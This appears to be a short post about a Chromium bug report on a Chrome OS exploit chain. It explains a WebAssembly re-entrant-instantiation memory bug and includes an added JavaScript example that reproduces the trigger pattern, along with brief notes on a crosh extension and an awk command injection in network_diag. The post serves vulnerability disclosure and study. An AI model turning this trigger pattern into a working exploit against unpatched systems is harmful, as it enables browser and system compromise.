Chrome OS exploit: WebAsm, Site Isolation, crosh, crash reporter, cryptohomed
https://bugs.chromium.org/p/chromium/issues/detail?id=766253 [bugs.chromium.org]
2017-11-16 01:06
Tons of fun stuff going on here.
Imports can be getters, which run while the instance is still being built and is not yet in a consistent state. If the getter builds another instance of the same module, the two instances share one WasmCompiledModule but have different ArrayBuffers for memory. The compiled code references only one of those memory buffers, so if the second memory grows, the compiled module gets confused and relocates its memory references against the wrong buffer, giving out-of-bounds memory access.
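Added example (not from the bug report or Chromium): the re-entrant instantiation pattern described above, reproduced on a hand-assembled module so it runs under any JS engine with WebAssembly support. The module (a single i32 load, one exported memory, one imported function named `env.hook`) and the helper names are my own. On a patched engine the assertions below hold: the two instances have separate memories, the grown page is readable only through the second instance, and the first instance traps when it reads past its own single page. The confusion the report describes is engine-internal and cannot be asserted from JavaScript; the point of the example is to show exactly when the getter runs and what state the two instances are in at that moment.

```javascript
// Hand-assembled module (constructed for this example):
//   import  env.hook : () -> ()          ; gives the import object something to run a getter on
//   memory  min 1 page, exported as "mem"
//   func    load(addr: i32) -> i32 = i32.load addr, exported as "load"
const WASM_BYTES = new Uint8Array([
  0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,                 // magic + version
  0x01, 0x09, 0x02, 0x60, 0x00, 0x00, 0x60, 0x01, 0x7f, 0x01, 0x7f, // type: ()->(), (i32)->i32
  0x02, 0x0c, 0x01, 0x03, 0x65, 0x6e, 0x76, 0x04, 0x68, 0x6f, 0x6f, 0x6b, 0x00, 0x00, // import env.hook (func type 0)
  0x03, 0x02, 0x01, 0x01,                                         // function: one func of type 1
  0x05, 0x03, 0x01, 0x00, 0x01,                                   // memory: min 1 page, no max
  0x07, 0x0e, 0x02, 0x03, 0x6d, 0x65, 0x6d, 0x02, 0x00,           // export "mem" = memory 0
  0x04, 0x6c, 0x6f, 0x61, 0x64, 0x00, 0x01,                       //        "load" = func 1
  0x0a, 0x09, 0x01, 0x07, 0x00, 0x20, 0x00, 0x28, 0x02, 0x00, 0x0b, // code: local.get 0; i32.load; end
]);

const PAGE = 65536;

function buildModule() {
  // One compiled module shared by every instance created from it.
  return new WebAssembly.Module(WASM_BYTES);
}

// Instantiate `module` with an import object whose `hook` property is a getter.
// The getter fires synchronously while the first instance is being built; inside it
// we create a second instance of the same module and grow that instance's memory.
function instantiateWithReentrantGetter(module, growPages) {
  const log = [];
  let second = null;
  const imports = {
    env: {
      get hook() {
        log.push('getter: running during first instantiation');
        second = new WebAssembly.Instance(module, { env: { hook: () => {} } });
        log.push('getter: second instance created, bytes=' + second.exports.mem.buffer.byteLength);
        second.exports.mem.grow(growPages);   // old ArrayBuffer is detached, a new one is allocated
        log.push('getter: second memory grown, bytes=' + second.exports.mem.buffer.byteLength);
        return () => {};                      // the value the engine actually imports
      },
    },
  };
  const first = new WebAssembly.Instance(module, imports);
  log.push('first instantiated, bytes=' + first.exports.mem.buffer.byteLength);
  return { first, second, log };
}

// Run the exported load; a wasm trap surfaces as WebAssembly.RuntimeError.
function loadOrTrap(instance, addr) {
  try {
    return { ok: true, value: instance.exports.load(addr) };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}

function demo(growPages = 1) {
  const module = buildModule();
  const { first, second, log } = instantiateWithReentrantGetter(module, growPages);
  // Poison the start of the second instance's grown page so a load that resolved
  // against the wrong memory would be visible as 0x41414141.
  new Uint32Array(second.exports.mem.buffer)[PAGE / 4] = 0x41414141;
  return {
    log,
    firstBytes: first.exports.mem.buffer.byteLength,
    secondBytes: second.exports.mem.buffer.byteLength,
    sameBuffer: first.exports.mem.buffer === second.exports.mem.buffer,
    firstLoadPage1: loadOrTrap(first, PAGE),    // beyond first's single page: must trap
    secondLoadPage1: loadOrTrap(second, PAGE),  // inside second's grown memory: reads the marker
  };
}

const result = demo();
console.log(result.log.join('\n'));
console.log('first:', result.firstLoadPage1, 'second:', result.secondLoadPage1);
```

Note that `second.exports.mem.buffer` must be re-read after `grow()`: growing detaches the previous ArrayBuffer, which is exactly the moment the shared compiled code's embedded memory reference goes stale in the bug the report describes.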
war-extension to crosh with process limit
network_diag has an awk command injection bug.
lamecalc should open again
source: L